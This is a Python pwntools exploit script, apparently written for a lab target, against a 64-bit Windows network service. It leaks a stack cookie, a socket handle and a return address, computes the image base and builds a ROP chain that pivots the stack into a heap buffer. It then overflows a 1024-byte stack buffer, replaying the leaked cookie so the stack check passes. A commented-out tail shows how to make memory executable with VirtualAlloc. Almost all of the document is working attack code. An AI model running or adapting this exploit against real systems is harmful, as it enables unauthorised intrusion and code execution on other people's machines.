- import socket
- import time
- from pwn import *
# p64()/u64() below follow context.arch.  The target appears to be a 64-bit
# Windows service (the chain resolves ws2_32.dll through GetModuleHandleW
# and passes arguments in rcx/rdx/r8/r9), so os='linux' only matters for
# asm/shellcraft, which this script never calls.
context.update(os='linux', arch='amd64')
# context.log_level = 'DEBUG'   # uncomment to dump every byte on the wire

# Lab target; the commented-out address is an earlier test box.
# HOST = '172.27.223.171'
HOST = '192.168.1.34'
PORT = 741

# One connection shared by every helper below.  The name is historical --
# this is a pwntools remote tube, not an ELF object -- but the rest of the
# script refers to it as `elf`, so it stays.
elf = remote(HOST, PORT)
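def send_data(data, *, delay=0.2):
    """Write *data* to the target socket, then pause.

    Every other helper in this script goes through here.  The pause gives
    the service time to handle one command before the next one is sent
    (the leak helper in particular sends and then immediately recv()s, so
    the delay is what keeps request and reply paired up).

    Args:
        data: raw bytes to send, exactly as given (no framing is added).
        delay: seconds to sleep after sending; keyword-only, defaults to
            the 0.2 s the script was tuned with.
    """
    elf.send(data)
    time.sleep(delay)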
def recv_data():
    """Return whatever the target has sent so far.

    This is a single pwntools ``recv()``: it returns the bytes currently
    available rather than a fixed count, so callers that need an exact
    number of bytes have to check the length themselves.
    """
    reply = elf.recv()
    return reply
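def send_cmd1(data):
    """Send command 0x01 carrying *data*.

    Wire format as this script uses it: the 4 bytes ``01 00 00 00``, one
    length byte holding ``len(data) // 8``, then the data.  The original
    spelled the length as ``int(len(data) / 2) >> 2``, which is the same
    value for any realistic length; presumably the service scales it back
    up to a byte count (confirm against the target before relying on it).

    Args:
        data: command payload; the caller is responsible for sizing it to
            what the service expects (this script sends 1024 + 5 * 8 bytes).

    Raises:
        ValueError: if ``len(data) // 8`` does not fit in the single length
            byte.  ``bytes()`` would raise anyway, but with a message that
            does not say which field overflowed.
    """
    length_units = len(data) // 8
    if length_units > 0xff:
        raise ValueError(
            "payload too long for the 1-byte length field: %d bytes (%d units)"
            % (len(data), length_units)
        )
    header = b'\x01\x00\x00\x00' + bytes([length_units])
    send_data(header + data)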
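def leak_nth_dword(n):
    """Leak the *n*-th 8-byte value through two 4-byte reads.

    Despite the name the result is 8 bytes: the command ``04 00 00 01``
    followed by one index byte returns four bytes, and this issues it for
    index ``2*n`` and ``2*n + 1``, concatenating the two replies.  Callers
    ``u64()`` the result (stack cookie, socket, return address, ...).

    Because the index is a single byte, *n* is limited to 0..127.

    Raises:
        ValueError: if ``2*n + 1`` does not fit in one byte.
        RuntimeError: if the two replies do not add up to exactly 8 bytes.
            ``recv()`` returns whatever is available, so a short or merged
            read would otherwise only show up later as a confusing
            ``u64()`` failure on a wrong-sized buffer.
    """
    first = 2 * n
    if not 0 <= first + 1 <= 0xff:
        raise ValueError("leak index %d does not fit in one byte" % n)
    leaked = b''
    for idx in (first, first + 1):
        send_data(b'\x04\x00\x00\x01' + bytes([idx]))
        leaked += recv_data()
    if len(leaked) != 8:
        raise RuntimeError(
            "expected 8 leaked bytes for slot %d, got %d: %r" % (n, len(leaked), leaked)
        )
    return leaked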
print("Leaking stuff...")


def _leak_qword(slot, label):
    """Leak 8-byte slot *slot*, print it with *label* and return it as an int."""
    value = u64(leak_nth_dword(slot))
    print(label.format(hex(value)))
    return value


# Slots 0..4 are, in order, the saved values the overflow has to replay
# (cookie and two qwords the author calls "memory privileges" and the
# socket), the saved return address and the heap buffer holding the command.
# Slot names are the author's; what the two middle qwords really are is not
# established by anything in this script.
leaked_cookie = _leak_qword(0, "Leaked cookie : {}")
leaked_mem_priv = _leak_qword(1, "Leaked memory privleges : {}")
leacked_sockfd = _leak_qword(2, "Leaked socket : {}")
leacked_ret = _leak_qword(3, "Leakead ret : {}")
leaked_allocBuffer = _leak_qword(4, "Leakead allocated buffer on heap : {}")

# The leaked return address points back into the service at image offset
# 0x2507 (a constant found by the author for this build); subtracting it
# recovers the image base that every gadget offset below is relative to.
base_addr = leacked_ret - 0x2507
print("Computed base addr : {}".format(hex(base_addr)))
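# Gadgets, all relative to base_addr.  The offsets belong to the build the
# script was written against; any other build needs every one re-found.
# The instruction sequences are those the author encoded in the names.
pop_rsp_ret = base_addr + 0x4d4a      # pop rsp; ret  -- the stack pivot
syscall = base_addr + 0x33acc         # not used by the chain below
pop_rcx_ret = base_addr + 0x13603     # (the original assigned this twice; once is enough)
pop_rdx_ret = base_addr + 0x1b4be
pop_r8_ret = base_addr + 0x3a6d
pop_rax_ret = base_addr + 0x3a6e      # pop_r8_ret + 1: presumably the same bytes minus the REX prefix
pop_rbx_ret = base_addr + 0x132c
j_rax = base_addr + 0x907d            # jmp rax
call_qword_ptr_rax_add_rsp_0x38_ret = base_addr + 0x194a   # call [rax]; add rsp, 0x38; ret
cmovne_r9d_r8d_movzx_eax_r9d_ret = base_addr + 0x752cb     # cmovne r9d, r8d; movzx eax, r9d; ret
xor_rax_rax_ret = base_addr + 0x3148f
xor_eax_edx_ret = base_addr + 0x3113c  # only used to clear ZF ahead of the cmovne
add_resp_0x28_ret = base_addr + 0x1194  # sic ("resp"); name kept, unused below
mov_rcx_rax_call_qwordptr_r8 = base_addr + 0x1946  # referenced only by the commented-out VirtualAlloc variant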
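# The original format string had no placeholder, so the pivot address it
# was given never appeared in the output.
print("Starting ROP (stack pivot gadget at {})...".format(hex(pop_rsp_ret)))

# Addresses the chain loads into rax before a `call [rax]` gadget, i.e.
# pointers to the resolved function pointers -- presumably the target's
# import table entries rather than the functions themselves.  Only
# GetModuleHandleWAddr is used by the live chain; the rest belong to the
# commented-out VirtualAlloc variant or are kept for experiments.
GetModuleHandleWAddr = base_addr + 0x7b1f8
LoadLibraryExWAddr = base_addr + 0x7b2d8
CreateThreadAddr = base_addr + 0x7b0a8
ResumeThreadAddr = base_addr + 0x7b0f0
VirtuallAllocAddr = base_addr + 0x7b098   # sic; name kept as the author wrote it
GetProcAddressAddr = base_addr + 0x7b0b8
ReadFileAddr = base_addr + 0x7b088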
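# ---------------------------------------------------------------------------
# ROP chain.  The command data lands in the heap buffer whose address was
# leaked above (leaked_allocBuffer); the pivot at the end of the payload
# moves rsp into that copy, so every address here is relative to it.
#
# The two buffer offsets the chain depends on (0x10 for the module-name
# string, 0x230 for the first gadget) are exactly 5 bytes past the matching
# offsets inside `ropchain`.  That lines up only if the 5-byte header that
# send_cmd1() writes is stored in front of the data -- inferred from the
# arithmetic, not verified against the target, so confirm it before
# touching the padding.
# ---------------------------------------------------------------------------
_CMD_HEADER_LEN = 5
_WSTR_OFFSET = 0x10    # buffer offset of L"ws2_32.dll"
_ROP_OFFSET = 0x230    # buffer offset of the first gadget (pivot target)

start_rop = leaked_allocBuffer + _ROP_OFFSET  # Keep some space for structures etc...

# NUL-terminated UTF-16LE "ws2_32.dll", the lpModuleName for GetModuleHandleW.
# (The original comment at the pop-rcx below called this kernel32; it is not.)
ws2_32_wstr = b'w\x00s\x002\x00_\x003\x002\x00.\x00d\x00l\x00l\x00\x00'

chain_prefix = b''.join([
    b'\x00' * 11,      # puts the string at buffer offset 0x10
    ws2_32_wstr,
    b'\x00' * 11,
    b'A' * 0x200,      # filler; the first gadget sits right after it
])
if (_CMD_HEADER_LEN + 11 != _WSTR_OFFSET
        or _CMD_HEADER_LEN + len(chain_prefix) != _ROP_OFFSET):
    raise RuntimeError("ROP chain prefix no longer lines up with the string/pivot offsets")

chain = [
    # GetModuleHandleW(L"ws2_32.dll"): rcx = lpModuleName, rax = pointer to
    # the function pointer, then `call [rax]; add rsp, 0x38; ret`.  The 0x38
    # filler is what the `add rsp` skips; the callee runs on top of it
    # (its shadow space starts there).
    p64(pop_rcx_ret),
    p64(leaked_allocBuffer + _WSTR_OFFSET),
    p64(pop_rax_ret),
    p64(GetModuleHandleWAddr),
    p64(call_qword_ptr_rax_add_rsp_0x38_ret),   # call [rax]; add rsp, 38; ret
    b'B' * 0x38,
    # send(sockfd, buf, 8, 0) by jumping to the service's own send call site
    # at base_addr + 0x25b9: rcx = socket, rdx = buffer, r8 = length, r9 = flags.
    # r9 is not set by a pop: r8 is loaded with 0, `xor eax, edx` clears ZF
    # (edx is the non-zero low half of the buffer pointer), and the cmovne
    # copies r8d into r9d.  Note this also clobbers rax, so the module
    # handle returned by GetModuleHandleW is never stored explicitly; the
    # 8 bytes sent back come from buffer offset 0x268, inside the 0x38
    # scratch area the callee ran on -- presumably where it left the
    # handle.  Confirm against the target if the leak changes.
    p64(pop_rcx_ret),
    p64(leacked_sockfd),
    p64(pop_rdx_ret),
    p64(leaked_allocBuffer + 0x258 + 0x10),
    p64(pop_r8_ret),
    p64(0x0),
    p64(xor_eax_edx_ret),                        # TO UNSET ZERO FLAG for cmovne
    p64(cmovne_r9d_r8d_movzx_eax_r9d_ret),
    p64(pop_r8_ret),
    p64(0x8),
    p64(pop_rax_ret),
    p64(base_addr + 0x25b9),
    p64(j_rax),
]
ropchain = chain_prefix + b''.join(chain)

# Alternative tail kept from the author's experiments (never enabled):
# VirtualAlloc the buffer RWX, jump into it, then resolve further imports.
# # VirtualAlloc to up memory size
# ropchain += p64(pop_rcx_ret)
# ropchain += p64(leaked_allocBuffer)
# ropchain += p64(pop_rdx_ret)
# ropchain += p64(0x1000)
# ropchain += p64(pop_r8_ret)
# ropchain += p64(0x40) # Make it executable why not ...
# ropchain += p64(xor_eax_edx_ret) # TO UNSET ZERO FLAG for cmovne
# ropchain += p64(cmovne_r9d_r8d_movzx_eax_r9d_ret)
# ropchain += p64(pop_r8_ret)
# ropchain += p64(0x1000)
# ropchain += p64(pop_rax_ret)
# ropchain += p64(VirtuallAllocAddr)
# ropchain += p64(call_qword_ptr_rax_add_rsp_0x38_ret)
# ropchain += b'B' * 0x38
# ropchain += p64(pop_rax_ret)
# ropchain += p64(leaked_allocBuffer + 0x1b8)
# ropchain += p64(j_rax)
# ropchain += p64(pop_r8_ret)
# ropchain += p64(GetProcAddressAddr)
# ropchain += p64(pop_rdx_ret)
# ropchain += p64(leaked_allocBuffer + 0x30)
# ropchain += p64(mov_rcx_rax_call_qwordptr_r8)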
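# Stack layout the overflow has to reproduce: 1024 bytes of buffer, then
# the three saved qwords leaked earlier (replayed verbatim so the cookie
# check passes and the service keeps working), then the return address.
_STACK_BUF_LEN = 1024
if len(ropchain) > _STACK_BUF_LEN:
    # The original computed b'C' * (negative) here, which silently yields
    # b'' and shifts every saved value and the pivot out of place.
    raise ValueError(
        "ROP chain is %d bytes, larger than the %d-byte stack buffer"
        % (len(ropchain), _STACK_BUF_LEN)
    )
payload = ropchain + b'C' * (_STACK_BUF_LEN - len(ropchain))  # pad up to the ret addr
payload += p64(leaked_cookie)
payload += p64(leaked_mem_priv)
payload += p64(leacked_sockfd)
payload += p64(pop_rsp_ret)   # saved return address -> pop rsp; ret
payload += p64(start_rop)     # popped into rsp: first gadget in the heap copy of the command

send_cmd1(payload)
# Command 0x05 is what makes the overflowed frame return (the handler
# then pops the pivot); what it means to the service otherwise is not
# known from this script.
send_data(b'\x05')
print(recv_data())
elf.interactive()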